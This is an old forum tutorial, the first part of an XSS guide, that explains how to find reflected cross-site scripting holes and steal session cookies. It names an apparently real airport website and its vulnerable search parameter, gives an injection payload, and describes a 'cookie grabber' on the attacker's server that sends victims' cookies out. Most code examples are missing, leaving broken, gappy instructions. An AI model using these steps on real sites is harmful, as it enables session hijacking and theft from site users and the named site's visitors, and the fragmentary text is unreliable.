XSS Guide - 1st Part

-------------------------------
Author: Langy
Data: 6-09-2007
Copyright: http://www.googlebig.com
-------------------------------

Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)

http://en.wikipedia.org/wiki/Cross-site_scripting

-------------------------------

Find a xss's vulnerable website is not very difficult.
In most cases can write in the search:

This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.

Now we try to write:

If this xss works, we will see on the screen the alert within our cookies session of the site.

Or if he had not run the url just check and see how it is generated:

- Example:

Last xss that I have discovered is on "aeroporto di Puglia" website:

http://www.seap-puglia.it/

if we try to find "><script>alert('try_xss');</script> nothing happens.
But now look at the url:

we find the variable that makes it possible to search, in this case "strRicerca1"

Then apply the alert code directly after this variable:

We will magically appear the alert.

Now we try to write:

Perfect! We see our cookie!

At this time we need to know the victim cookie and then comes in a "cookie grabbers". Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim :D


If we want include a file with javascript we can write:

Inside the file "cookiescript.js" we write a code that displays the cookie and sends it by e-mail.

This will be shown in the second part of the guide.

The following guide can be used freely on any site without changes including copyright.

Go to 2nd part of guide

This post was last modified: 11-02-2008 04:21 PM by Langy.